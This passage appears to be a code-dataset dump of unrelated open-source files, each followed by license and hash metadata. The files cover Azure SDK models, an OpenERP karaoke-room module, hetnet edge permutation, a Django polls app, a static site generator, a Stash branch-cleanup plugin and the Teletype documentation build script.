'id': {'key': 'id', 'type': 'str'},
'default_backend_address_pool': {'key': 'properties.defaultBackendAddressPool', 'type': 'SubResource'},
'default_backend_http_settings': {'key': 'properties.defaultBackendHttpSettings', 'type': 'SubResource'},
'default_redirect_configuration': {'key': 'properties.defaultRedirectConfiguration', 'type': 'SubResource'},
'path_rules': {'key': 'properties.pathRules', 'type': '[ApplicationGatewayPathRule]'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, id=None, default_backend_address_pool=None, default_backend_http_settings=None, default_redirect_configuration=None, path_rules=None, provisioning_state=None, name=None, etag=None, type=None):
super(ApplicationGatewayUrlPathMap, self).__init__(id=id)
self.default_backend_address_pool = default_backend_address_pool
self.default_backend_http_settings = default_backend_http_settings
self.default_redirect_configuration = default_redirect_configuration
self.path_rules = path_rules
self.provisioning_state = provisioning_state
self.name = name
self.etag = etag
self.type = type
| mit | -8,994,817,424,965,197,000 | 47.528571 | 215 | 0.664999 | false |
chengdh/openerp-ktv | openerp/addons/ktv_sale/room_operate.py | 1 | 3418 | # -*- coding: utf-8 -*-
from osv import osv,fields
from room import room
class room_operate(osv.osv):
'''
包厢操作类:
以下操作都属于包厢操作:
1 预定
2 正常开房
3 买钟
4 买断
5 续钟
6 退钟
7 换房
8 并房
包厢通过cur_room_operate_id与room_operate相关联,用于标示当前包厢所对应的操作
room_operate与以上各个操作是one2many的关系,这样通过一个room_operate可以获取所有包厢在开房过程中所进行的操作,结账时遍历所有的操作并进行计算即可
'''
_name = "ktv.room_operate"
#由于在其他地方需要引用该对象,所有将name定义为bill_no
_rec_name = "bill_no"
_description = "包厢操作类,与包厢是many2one的关系"
_columns = {
"operate_date" : fields.datetime('operate_datetime',required = True),
"room_id" : fields.many2one('ktv.room','room_id',required = True),
"bill_no" : fields.char("bill_no",size = 64,required = True,help = "账单号"),
"room_scheduled_ids" : fields.one2many("ktv.room_scheduled","room_operate_id",help="预定信息列表"),
"room_opens_ids" : fields.one2many("ktv.room_opens","room_operate_id",help="开房信息列表"),
}
_defaults = {
'operate_date' : fields.datetime.now,
'bill_no': lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'ktv.room_operate'),
}
def process_operate(self,cr,uid,operate_values):
"""
包厢操作统一入口,调用不同业务类的操作
这样设计的好处是隔离了变化,如果需要修改服务端的逻辑,客户端的调用逻辑不用做任何修改
在客户端新增了业务实体调用,只用增加新的实体即可,其他不用做修改
在js端也需要封装同样的调用接口来隔离变化
:params room_id integer 包厢编码
:operate_values 前端传入的业务操作数据
:operate[osv_name] 要调用的实体业务对象名称,比如ktv.room_checkout
调用示例:
开房操作,返回三个参数 1 操作成功的实体对象 2 包厢应修改的状态 3 cron对象,用于处理对包厢的定时操作:
(operate_obj,room_state,cron) = self.pool.get(operate_values['osv_name']).process_operate(cr,uid,opeate_values)
更新当前包厢状态,添加cron对象,返回处理结果
"""
room_id = operate_values['room_id']
(operate_obj,room_state,cron) = self.pool.get(operate_values['osv_name']).process_operate(cr,uid,operate_values)
#更新包厢状态
self.pool.get('ktv.room').write(cr,uid,room_id,{'state' : room_state})
#TODO 添加cron对象
if cron:
self._create_operate_cron(cr,uid,cron)
room_fields = self.pool.get('ktv.room').fields_get(cr,uid).keys()
room = self.pool.get('ktv.room').read(cr,uid,room_id,room_fields)
#返回两个对象room和room_operate
return {'room' : room,'room_operate' : operate_obj}
def _create_operate_cron(self,cr,uid,cron_vals):
"""
创建cron定时执行任务,在需要定时执行关房任务时,需要执行
:params dict cron_vals 定时任务相关属性
"""
return self.pool.get('ir.cron').create(cr,uid,cron_vals)
| agpl-3.0 | -4,107,985,104,135,844,400 | 35.166667 | 120 | 0.621352 | false |
dhimmel/hetio | hetnetpy/permute.py | 1 | 9110 | import collections
import random
import logging
from hetnetpy.hetnet import Graph
def permute_graph(graph, multiplier=10, seed=0, metaedge_to_excluded=dict(), log=False):
"""
Derive a permuted hetnet from an input hetnet. This method applies the
XSwap algorithm separately for each metaedge. Hence, node degree is
preserved for each type of edge. However, edges are randomized / shuffled.
Users are recommended to interrogate the reported statistics to ensure that
edges appear to be sufficiently randomized. Primarily, the number of edges
of a given metaedge that remain unchanged from the original hetnet should
have reached an assymptote. If the number of unchanged edges has not yet
stabalized, further randomization is possible with this approach.
Parameters
----------
graph : hetnetpy.hetnet.Graph
Input hetnet to create a permuted derivative from
multiplier : int or float
This is multiplied by the number of edges for each metaedge to
determine the number of swaps to attempt.
seed : int
Seed to initialize Python random number generator. When creating many
permuted hetnets, it's recommended to increment this number, such that
each round of permutation shuffles edges in a different order.
metaedge_to_excluded : dict (metaedge -> set)
Edges to exclude. This argument has not been extensively used in
practice.
log : bool
Whether to log diagnostic INFO via python's logging module.
Returns
-------
permuted_graph : hetnetpy.hetnet.Graph
A permuted hetnet derived from the input graph.
stats : list of dicts
A list where each item is a dictionary of permutation statistics at a
checkpoint for a specific metaedge. These statistics allow tracking the
progress of the permutation as the number of attempted swaps increases.
"""
if log:
logging.info("Creating permuted graph template")
permuted_graph = Graph(graph.metagraph)
for (metanode_identifier, node_identifier), node in graph.node_dict.items():
permuted_graph.add_node(
metanode_identifier, node_identifier, name=node.name, data=node.data
)
if log:
logging.info("Retrieving graph edges")
metaedge_to_edges = graph.get_metaedge_to_edges(exclude_inverts=True)
if log:
logging.info("Adding permuted edges")
all_stats = list()
for metaedge, edges in metaedge_to_edges.items():
if log:
logging.info(metaedge)
excluded_pair_set = metaedge_to_excluded.get(metaedge, set())
pair_list = [(edge.source.get_id(), edge.target.get_id()) for edge in edges]
directed = metaedge.direction != "both"
permuted_pair_list, stats = permute_pair_list(
pair_list,
directed=directed,
multiplier=multiplier,
excluded_pair_set=excluded_pair_set,
seed=seed,
log=log,
)
for stat in stats:
stat["metaedge"] = metaedge
stat["abbrev"] = metaedge.abbrev
all_stats.extend(stats)
for pair in permuted_pair_list:
permuted_graph.add_edge(pair[0], pair[1], metaedge.kind, metaedge.direction)
return permuted_graph, all_stats
def permute_pair_list(
pair_list,
directed=False,
multiplier=10,
excluded_pair_set=set(),
seed=0,
log=False,
inplace=False,
):
"""
Permute edges (of a single type) in a graph according to the XSwap function
described in https://doi.org/f3mn58. This method selects two edges and
attempts to swap their endpoints. If the swap would result in a valid edge,
the swap proceeds. Otherwise, the swap is skipped. The end result is that
node degree is preserved, but edges are shuffled, thereby losing their
original meaning.
Parameters
----------
pair_list : list of tuples
List of edges to permute. Each edge is represented as a (source,
target) tuple. source and target represent nodes and can be any Python
objects that define __eq__. In other words, this function does not
assume any specific format for nodes. If the edges are from a bipartite
or directed graph, then all tuples must have the same alignment. For
example, if the edges represent the bipartite Compound-binds-Gene
relationship, all tuples should be of the form (compound, gene) and not
intermixed with (gene, compound) tuples. The only instance where order
of the source and target is not important is for an undirected edge
type where the source and target nodes are of the same type, such as
Gene-interacts-Gene.
directed : bool
Whether the edge should be considered directed. If False, a swap that
creates an a-b edge will be invalid if a b-a edge already exists.
multiplier : int or float
This is multiplied by the number of edges in pair_list to determine the
number of swaps to attempt.
excluded_pair_set : set of tuples:
Set of possible edges to forbid. If a swap would create an edge in this
set, it would be considered invalid and hence skipped.
seed : int
Seed to initialize Python random number generator.
log : bool
Whether to log diagnostic INFO via python's logging module.
inplace : bool
Whether to modify the edge list in place.
Returns
-------
pair_list : list of tuples
The permuted edges, derived from the input pair_list.
stats : list of dicts
A list where each item is a dictionary of permutation statistics at a
checkpoint. Statistics are collected at 10 checkpoints, spaced evenly
by the number of attempts.
"""
random.seed(seed)
if not inplace:
pair_list = pair_list.copy()
pair_set = set(pair_list)
assert len(pair_set) == len(pair_list)
edge_number = len(pair_list)
n_perm = int(edge_number * multiplier)
count_same_edge = 0
count_self_loop = 0
count_duplicate = 0
count_undir_dup = 0
count_excluded = 0
if log:
logging.info(
"{} edges, {} permutations (seed = {}, directed = {}, {} excluded_edges)".format(
edge_number, n_perm, seed, directed, len(excluded_pair_set)
)
)
orig_pair_set = pair_set.copy()
step = max(1, n_perm // 10)
print_at = list(range(step, n_perm, step)) + [n_perm - 1]
stats = list()
for i in range(n_perm):
# Same two random edges
i_0 = random.randrange(edge_number)
i_1 = random.randrange(edge_number)
# Same edge selected twice
if i_0 == i_1:
count_same_edge += 1
continue
pair_0 = pair_list.pop(i_0)
pair_1 = pair_list.pop(i_1 - 1 if i_0 < i_1 else i_1)
new_pair_0 = pair_0[0], pair_1[1]
new_pair_1 = pair_1[0], pair_0[1]
valid = False
for pair in new_pair_0, new_pair_1:
if pair[0] == pair[1]:
count_self_loop += 1
break # edge is a self-loop
if pair in pair_set:
count_duplicate += 1
break # edge is a duplicate
if not directed and (pair[1], pair[0]) in pair_set:
count_undir_dup += 1
break # edge is a duplicate
if pair in excluded_pair_set:
count_excluded += 1
break # edge is excluded
else:
# edge passed all validity conditions
valid = True
# If new edges are invalid
if not valid:
for pair in pair_0, pair_1:
pair_list.append(pair)
# If new edges are valid
else:
for pair in pair_0, pair_1:
pair_set.remove(pair)
for pair in new_pair_0, new_pair_1:
pair_set.add(pair)
pair_list.append(pair)
if i in print_at:
stat = collections.OrderedDict()
stat["cumulative_attempts"] = i
index = print_at.index(i)
stat["attempts"] = (
print_at[index] + 1
if index == 0
else print_at[index] - print_at[index - 1]
)
stat["complete"] = (i + 1) / n_perm
stat["unchanged"] = len(orig_pair_set & pair_set) / len(pair_set)
stat["same_edge"] = count_same_edge / stat["attempts"]
stat["self_loop"] = count_self_loop / stat["attempts"]
stat["duplicate"] = count_duplicate / stat["attempts"]
stat["undirected_duplicate"] = count_undir_dup / stat["attempts"]
stat["excluded"] = count_excluded / stat["attempts"]
stats.append(stat)
count_same_edge = 0
count_self_loop = 0
count_duplicate = 0
count_undir_dup = 0
count_excluded = 0
assert len(pair_set) == edge_number
return pair_list, stats
| cc0-1.0 | 7,102,797,442,596,513,000 | 36.03252 | 93 | 0.615038 | false |
coetzeevs/chiron | mysite/polls/views.py | 1 | 1976 | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.template import loader
from .models import Question, Choice
from django.urls import reverse
from django.views import generic
from django.utils import timezone
from django.core.mail import EmailMessage
from django.conf import settings
class IndexView(generic.ListView):
template_name = 'polls/index.html'
context_object_name = 'latest_question_list'
def get_queryset(self):
"""
Return the last five published questions (not including those set to be
published in the future).
"""
return Question.objects.filter(
pub_date__lte=timezone.now()
).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
def get_queryset(self):
"""
Excludes any questions that aren't published yet.
"""
return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def email(request):
email = EmailMessage('hello', 'Hello Johan, Minder OLX en meer ChiChi',settings.EMAIL_HOST_USER, to=['[email protected]'])
email.send()
return HttpResponse("Hello, world. You're at the polls index.")
def vote(request, question_id):
question = get_object_or_404(Question, pk=question_id)
try:
selected_choice = question.choice_set.get(pk=request.POST['choice'])
except (KeyError, Choice.DoesNotExist):
# Redisplay the question voting form.
return render(request, 'polls/detail.html', {
'question': question,
'error_message': "You didn't select a choice.",
})
else:
selected_choice.votes += 1
selected_choice.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('polls:results', args=(question.id,))) | mit | -8,582,128,274,714,350,000 | 30.380952 | 130 | 0.745951 | false |
yvesalexandre/bandicoot | bandicoot/__init__.py | 1 | 1498 | # The MIT License (MIT)
#
# Copyright (c) 2015-2016 Massachusetts Institute of Technology.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
__all__ = ['core', 'individual', 'spatial', 'recharge', 'network', 'helper', 'io', 'utils', 'tests']
from .io import read_csv, to_json, to_csv
from .core import User, Record, Recharge, Position
from . import individual, spatial, recharge, network, helper, utils, io, tests, core, visualization
import bandicoot.helper.tools
__version__ = "0.6.0"
| mit | -4,582,053,342,048,739,000 | 47.322581 | 100 | 0.757009 | false |
sphaero/appie | appie/appie.py | 1 | 10447 | #!/usr/bin/python3
#
# Copyright (c) 2013, Arnaud Loonstra, All rights reserved.
# Copyright (c) 2013, Stichting z25.org, All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either
# version 3.0 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License v3 for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library.
import os
import shutil
from functools import reduce
import textile
import json
import logging
import pprint
# for pre 3.5 python versions
try:
os.scandir
except AttributeError:
import scandir
os.scandir = scandir.scandir
logger = logging.getLogger(__name__)
config = {
'target': "./build",
'src': "./site_src"
}
def mergedicts(dict1, dict2):
for k in set(dict1.keys()).union(dict2.keys()):
if k in dict1 and k in dict2:
if isinstance(dict1[k], dict) and isinstance(dict2[k], dict):
yield (k, dict(mergedicts(dict1[k], dict2[k])))
else:
# If one of the values is not a dict, you can't continue merging it.
# Value from second dict overrides one in first and we move on.
yield (k, dict2[k])
# Alternatively, replace this with exception raiser to alert you of value conflicts
elif k in dict1:
yield (k, dict1[k])
else:
yield (k, dict2[k])
class AppieDirParser(object):
"""
The default dir parser. Searches for parsers matching file or
directory parsers. If none found it recurses into subdirs and
loads files prepended with '_'(underscore).
Files are copied to the build root.
A file is represented by a dictionary with at least the following keys
* content: file content if applicable
* path: filepath ( in the build dir )
* mtime: modification time
"""
def match(self, name):
"""
Test if this parser matches for a name
:param str name: file or directory name
"""
return False
def is_modified(self, dirobj, prev_dict):
"""
Check file's mtime and compares it to the previous run value
Returns true if newer
"""
if not prev_dict or not prev_dict.get(dirobj.name):
return True # no previous data found so modified
return dirobj.stat().st_mtime > prev_dict.get(dirobj.name)[ 'mtime' ]
def parse_dir(self, path, dest_path, prev_dict=None):
"""
Parse a directory. Will search parser to match file or directory names
:param str path: path of the directory
:param str dest_path: path of the destination directory
:param dict prev_dict: the dictionary belonging to this directory loaded
from a previous run
Returns the dictionary with contents of the directory
"""
prev_dict = prev_dict or {}
d = {}
for item in os.scandir(path):
# save the relative! path in the buildroot instead of the original
web_path = dest_path.split(config['target'])[1][1:]
if item.is_dir():
d[item.name] = self.parse_subdir( item, dest_path, prev_dict, web_path)
elif self.is_modified( item, prev_dict ):
# find a parser for this file
parser = Appie.match_file_parsers(item.name)
d[item.name] = parser.parse_file( item.path, item.name, dest_path )
d[item.name]['path'] = web_path
d[item.name]['mtime'] = item.stat().st_mtime
# copy file to dest if no content key
if not d[item.name].get( 'content' ) and parser.copyfile:
logging.debug("Copy file {0} to the directory {1}"\
.format(path, dest_path))
shutil.copy(item.path, dest_path)
else:
d[item.name] = prev_dict[item.name]
return d
def parse_subdir(self, diritem, dest_path, prev_dict, web_path):
ret = {}
new_dest_path = os.path.join(dest_path, diritem.name)
# first create its dir
try:
os.makedirs(new_dest_path)
except FileExistsError:
pass
# find a parser for this dir
parser = Appie.match_dir_parsers(diritem.name)
content = parser.parse_dir( diritem.path, new_dest_path, prev_dict.get( diritem.name ))
# add meta information if the parser returned content
if content:
content['path'] = web_path
content['mtime'] = diritem.stat().st_mtime
else:
# if not we can remove the dir TODO: does this hold?
# will error if new_dest_path not empty
os.remove(new_dest_path)
return content
class AppieFileParser(object):
"""
Appie default file parser. Loads the content of a file if
it starts with _ (underscore).
"""
def __init__(self, *args, **kwargs):
self.copyfile = True # use the flag to tell the dirparser
# to copy the file or not
def match(self, name):
"""
Matches on files with the extension .textile
"""
if name[0] == '_':
return True
def parse_file(self, path, filename, dest_path):
"""
Parse file. If it starts with '_' (underscore) it will be loaded
and returned as the content key in a dictionary
Override this method in a custom parser class and add any data you
need.
:param str path: Path to the file
:param str filename: The name of the file
"""
if self.match(filename): # we only test again because the FileParser is always returned if
return { 'content': self.load_file(path) } # no other parser matches but we only want to load if starting with _
return {}
def load_file(self, path, mode='r'):
"""
parse the file and return the content for the dict
:param str file: the path to the file
"""
with open(path, mode, encoding="utf8") as f:
data = f.read()
f.close()
return data
class AppieTextileParser(AppieFileParser):
"""
Simple textile file to html parser
"""
def match(self, name):
"""
Matches on files with the extension .textile
"""
logging.debug('Matching AppieTextileParser to {0}'.format(name))
if name.endswith('.textile'):
return True
def parse_file(self, path, filename, dest_path):
"""
Parses textile files to html.
:param path: full path of the file
:param filename: the name of the file
Returns a dictionary with the content of the file in the content
key!
"""
logging.debug("TextileParser parsing {0}".format(filename))
t = textile.textile(self.load_file(path))
return { 'content': t }
class Appie(object):
dir_parsers = []
file_parsers = []
def __init__(self, *args, **kwargs):
# check if string and convert to list if so
if isinstance(config["src"], str):
config["src"] = [config["src"]]
self._buildwd = os.path.abspath(config["target"])
def add_directory_parser(self, inst):
"""
Adds a parser instance to match on directory names
:param instance inst: parser instance
"""
Appie.dir_parsers.insert(0, inst)
def add_file_parser(self, inst):
"""
Adds a parser instance to match on filenames
:param instance inst: parser instance
"""
Appie.file_parsers.insert(0, inst)
@staticmethod
def match_dir_parsers(dirname):
"""
Returns the parser for the directory
:params str dirname: directory name to match on
"""
for p in Appie.dir_parsers:
if p.match(dirname):
return p
return AppieDirParser() # default is self
@staticmethod
def match_file_parsers(filename):
"""
Returns the parser for the file
:params str filename: filename to match on
"""
for p in Appie.file_parsers:
if p.match(filename):
return p
return AppieFileParser() # default is AppieFileParser
def parse(self):
"""
Parse the all source directories
"""
# create the buildroot
prev = None # previous all.json container
try:
os.makedirs(self._buildwd)
except FileExistsError:
# try to load previous run
try:
prev = self.load_dict( os.path.join(self._buildwd, 'all.json' ) )
except FileNotFoundError:
prev = None
final = {}
for src in config["src"]:
d = AppieDirParser().parse_dir( src, config["target"], prev )
final = dict(mergedicts(final, d))
#return final
self.save_dict(final, os.path.join(config["target"], 'all.json'))
def save_dict(self, d, filepath):
"""
Save dictionary to json file
:param dict d: the dictionary to save
:param string filepath: string containing the full target filepath
"""
with open(filepath, 'w') as f:
json.dump(d, f)
def load_dict(self, filepath):
"""
load json file
:param dict d: the dictionary to save
:param string filepath: string containing the full target filepath
"""
with open(filepath, 'r') as f:
d = json.load(f)
return d
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
config["src"] = '../tests/site_src'
a = Appie()
a.add_file_parser(AppieTextileParser())
a.parse()
| gpl-3.0 | 1,061,268,915,449,003,600 | 32.376997 | 126 | 0.57538 | false |
LACNIC/simon | simon-web/simon_app/templatetags/simon_extras.py | 1 | 2401 | from django import template
from datetime import datetime
from simon_app.functions import GMTUY
import operator
"""
Module that holds the Simon
"""
register = template.Library()
@register.filter(name="substract")
def substract(value, arg):
"""
Substract
"""
return value - arg
@register.filter(name="divide")
def divide(value, arg):
"""
Float division
"""
return float(value) / float(arg)
@register.filter(name="percentage")
def percentage(value, arg):
"""
Percentage
"""
return 100.0 * divide(value, arg)
@register.filter(name="unit_shortener")
def unit_shortener(value):
"""
Unit converter
"""
try:
int(value)
float(value)
except:
return "N/A"
K = 1000
M = K * K
G = K * M
T = K * G
if value > T:
return "%.1f %s" % (1.0 * value / T, 'T')
if value > G:
return "%.1f %s" % (1.0 * value / G, 'G')
if value > M:
return "%.1f %s" % (1.0 * value / M, 'M')
if value > K:
return "%.1f %s" % (1.0 * value / K, 'K')
return value
@register.filter(name="time_since")
def time_since(value):
"""
:param now:
:return:
"""
td = datetime.now(GMTUY()) - value
print td
if td.days > 1:
return "mas de un dia"
elif td.seconds > 3600:
mins = "%.0f minutos" % ((td.seconds % 3600) / 60)
horas = "%.0f %s" % (td.seconds / 3600, "horas" if td.seconds / 3600 > 1 else "hora")
return "%s %s" % (horas, mins)
elif td.seconds > 60:
return "%.0f minutos" % (td.seconds / 60)
else:
return "%.0f segundos" % td.seconds
@register.filter(name="max")
def max_(value, arg):
"""
:param value:
:param arg:
:return:
"""
if arg == 'v6_rate':
return str(max([v.v6_rate for v in value]))
return "%s %s" % (value, arg)
@register.filter(name="get_by_attribute")
def get_by_attribute(objects, raw_args):
print raw_args
key, value = raw_args.split(' ')
print key, value
func = operator.attrgetter(key)
for o in objects:
if func(o) == value:
return o
class Object():
pass
a = Object()
setattr(a, key, 0)
return a
@register.filter(name="get_attribute")
def get_attribute(object, attr):
func = operator.attrgetter(attr)
return func(object)
| gpl-2.0 | 4,992,362,165,801,028,000 | 18.208 | 93 | 0.548105 | false |
gpailler/AtlassianBot | plugins/stash.py | 1 | 1971 | # coding: utf-8
import requests
from utils import rest
class Stash(object):
def __init__(self, server):
self.__server = server
def get_stash_branches(self, repos, project, filter):
results = []
for repo in repos:
path = '/rest/api/1.0/projects/{project}/repos/{repo}/branches'\
.format(project=project, repo=repo)
data = {
'filterText': filter,
'details': True,
'limit': 100
}
request = rest.get(self.__server, path, data)
for result in request.json()['values']:
results.append((
repo,
result['id'],
result['displayId'],
result['latestChangeset']))
return results
def branch_merged(self, project, basebranches, repo, branch):
for to in basebranches:
path = ('/rest/api/1.0/projects/{project}/repos/{repo}/'
'compare/changes/').format(project=project, repo=repo)
data = {
'from': branch,
'to': to,
'limit': 1
}
request = rest.get(self.__server, path, data)
if request.status_code != requests.codes.ok:
raise Exception(request.text)
else:
if request.json()['size'] == 0:
return True
return False
def remove_git_branches(self, project, repo, branchkey, changeset):
path = ('/rest/branch-utils/1.0/projects/{project}/repos/{repo}/'
'branches').format(project=project, repo=repo)
data = {
'name': branchkey,
'endPoint': changeset,
'dryRun': False
}
request = rest.delete(self.__server, path, data)
if request.status_code != requests.codes.no_content:
raise Exception(request.text)
| mit | -3,836,757,531,418,483,700 | 30.790323 | 76 | 0.499239 | false |
samdoshi/teletype | utils/docs.py | 1 | 6073 | #!/usr/bin/env python3
import sys
from pathlib import Path
import jinja2
import pypandoc
import pytoml as toml
from common import list_ops, list_mods, validate_toml, get_tt_version
if (sys.version_info.major, sys.version_info.minor) < (3, 6):
raise Exception("need Python 3.6 or later")
THIS_FILE = Path(__file__).resolve()
ROOT_DIR = THIS_FILE.parent.parent
TEMPLATE_DIR = ROOT_DIR / "utils" / "templates"
DOCS_DIR = ROOT_DIR / "docs"
OP_DOCS_DIR = DOCS_DIR / "ops"
FONTS_DIR = ROOT_DIR / "utils" / "fonts"
TT_VERSION = get_tt_version()
VERSION_STR = " ".join(["Teletype", TT_VERSION["tag"], TT_VERSION["hash"],
"Documentation"])
env = jinja2.Environment(
autoescape=False,
loader=jinja2.FileSystemLoader(str(TEMPLATE_DIR)),
trim_blocks=True,
lstrip_blocks=True,
cache_size=0,
auto_reload=True
)
# determines the order in which sections are displayed
OPS_SECTIONS = [
"variables",
"hardware",
"patterns",
"controlflow",
"maths",
"metronome",
"delay",
"stack",
"queue",
"turtle",
"grid",
"ansible",
"whitewhale",
"meadowphysics",
"earthsea",
"orca",
"justfriends",
"telex_i",
"telex_o",
"er301",
"fader",
"wslash",
"matrixarchate"
]
def deep_merge_dict(source, destination):
for key, value in source.items():
if isinstance(value, dict):
node = destination.setdefault(key, {})
deep_merge_dict(value, node)
else:
destination[key] = value
return destination
def common_md():
print(f"Pandoc version: {pypandoc.get_pandoc_version()}")
print(f"Using docs directory: {DOCS_DIR}")
print(f"Using ops docs directory: {OP_DOCS_DIR}")
print()
op_table_template = env.get_template("op_table.jinja2.md")
op_extended_template = env.get_template("op_extended.jinja2.md")
output = ""
output += Path(DOCS_DIR / "intro.md") \
.read_text().replace("VERSION", TT_VERSION["tag"][1:]) + "\n\n"
output += Path(DOCS_DIR / "whats_new.md").read_text() + "\n\n"
output += Path(DOCS_DIR / "quickstart.md").read_text() + "\n\n"
output += Path(DOCS_DIR / "keys.md").read_text() + "\n\n"
output += Path(DOCS_DIR / "ops.md").read_text() + "\n\n"
all_ops = set(list_ops()) | set(list_mods())
all_ops_dict = {}
ops_with_docs = set()
for section in OPS_SECTIONS:
md_file = Path(OP_DOCS_DIR, section + ".md")
toml_file = Path(OP_DOCS_DIR, section + ".toml")
output += "\\newpage\n"
if md_file.exists() and md_file.is_file():
print(f"Reading {md_file}")
output += md_file.read_text() + "\n\n"
output += "\n"
if toml_file.exists() and toml_file.is_file():
print(f"Reading {toml_file}")
extended = []
# n.b. Python 3.6 dicts maintain insertion order
ops = toml.loads(toml_file.read_text())
validate_toml(ops)
deep_merge_dict(ops, all_ops_dict)
for key in ops:
if key not in all_ops:
print(f" - WARNING: unknown {key}")
ops_with_docs.add(key)
if "aliases" in ops[key]:
ops_with_docs |= set(ops[key]["aliases"])
if "description" in ops[key]:
render = op_extended_template.render(name=key, **ops[key])
extended.append((key, render))
output += op_table_template.render(ops=ops.values())
output += "\n"
output += "\n".join([e[1] for e in extended]) + "\n\n"
output += Path(DOCS_DIR / "advanced.md").read_text() + "\n\n"
output += "\\appendix\n\n"
output += "# Alphabetical list of OPs and MODs\n\n"
sorted_ops = [kv[1] for kv in sorted(all_ops_dict.items())]
output += op_table_template.render(ops=sorted_ops)
output += "\n\n# Missing documentation\n\n"
missing_ops = all_ops - ops_with_docs
output += ", ".join([f"`{o}`" for o in sorted(missing_ops)]) + "\n\n"
output += Path(ROOT_DIR / "CHANGELOG.md").read_text() + "\n\n"
return output
def main():
if len(sys.argv) <= 1:
sys.exit("Please supply a filename")
input_format = "markdown"
output = common_md()
print()
for arg in sys.argv[1:]:
p = Path(arg).resolve()
print(f"Generating: {p}")
ext = p.suffix
if ext == ".md":
p.write_text(output)
elif ext == ".html":
output = "# " + VERSION_STR + "\n\n" + output
pypandoc.convert_text(
output,
format=input_format,
to="html5",
outputfile=str(p),
extra_args=["--standalone",
"--self-contained",
"--toc",
"--toc-depth=2",
"--css=" + str(TEMPLATE_DIR / "docs.css"),
"--template=" + str(TEMPLATE_DIR /
"template.html5")])
elif ext == ".pdf" or ext == ".tex":
latex_preamble = env.get_template("latex_preamble.jinja2.md")
latex = latex_preamble \
.render(title=VERSION_STR, fonts_dir=FONTS_DIR) + "\n\n"
latex += output
pandoc_version = int(pypandoc.get_pandoc_version()[0])
engine = ("--pdf-engine=xelatex"
if pandoc_version >= 2
else "--latex-engine=xelatex")
pypandoc.convert_text(
latex,
format=input_format,
to=ext[1:],
outputfile=str(p),
extra_args=["--standalone",
"--column=80",
"--toc",
"--toc-depth=2",
engine,
"--variable=papersize:A4"])
if __name__ == "__main__":
main()
| gpl-2.0 | -4,714,646,216,518,015,000 | 29.671717 | 78 | 0.513091 | false |
mylokin/redisext | tests/test_expire.py | 1 | 1260 | from __future__ import absolute_import
import redisext.counter
import redisext.key
import redisext.serializer
from . import fixture
class ExpireCounter(redisext.counter.Counter, redisext.key.Expire):
EXPIRE = 60
CONNECTION = fixture.Connection
SERIALIZER = redisext.serializer.Numeric
class ExpireCounterTestCase(fixture.TestCase):
def setUp(self):
self.counter = ExpireCounter('key')
self.counter.incr()
self.counter.expire()
def test_expire(self):
self.assertTrue(60 >= self.counter.ttl() > 0)
def test_persist(self):
self.counter.persist()
self.assertEqual(self.counter.ttl(), -1)
class UnspecifiedExpireCounter(redisext.counter.Counter, redisext.key.Expire):
CONNECTION = fixture.Connection
SERIALIZER = redisext.serializer.Numeric
class UnspecifiedExpireCounterTestCase(fixture.TestCase):
def setUp(self):
self.counter = UnspecifiedExpireCounter('key')
def test_expire_unspecified(self):
self.counter.incr()
with self.assertRaises(ValueError):
self.counter.expire()
def test_expire_specified(self):
self.counter.incr()
self.counter.expire(60)
self.assertTrue(60 >= self.counter.ttl() > 0)
| mit | -488,243,151,904,911,100 | 25.808511 | 78 | 0.694444 | false |
wcmckee/lcacoffee | hostassign.py | 1 | 2135 |
# coding: utf-8
# script to assign hostname and ip address to machine
# In[63]:
import os
import random
import json
import shutil
# In[37]:
colordir = os.listdir('/home/wcmckee/colortest/')
# In[42]:
alcolrz = []
# In[43]:
for cold in colordir:
#print cold
if '.json' in cold:
print cold
alcolrz.append(cold)
# In[47]:
alranza = random.choice(alcolrz)
# In[48]:
alranza
# In[71]:
checkexist = os.listdir('/home/wcmckee/colortest/assignedhosts/')
assignedh = []
# In[72]:
for chex in checkexist:
print chex
assignedh.append(chex)
#os.remove('/home/wcmckee/colortest/' + chex)
# In[73]:
colordir
# In[80]:
assignedh
# In[83]:
toremvz = set(colordir) & set(assignedh)
# In[88]:
tolidt = list(toremvz)
# In[91]:
for tolid in tolidt:
print tolid
os.remove('/home/wcmckee/colortest/' + tolid)
# In[ ]:
# In[ ]:
# In[89]:
tolidt
# In[50]:
opjsflz = open('/home/wcmckee/colortest/' + alranza, 'r')
# In[51]:
nerza = opjsflz.read()
# In[53]:
nerza
# In[55]:
neadict = json.loads(nerza)
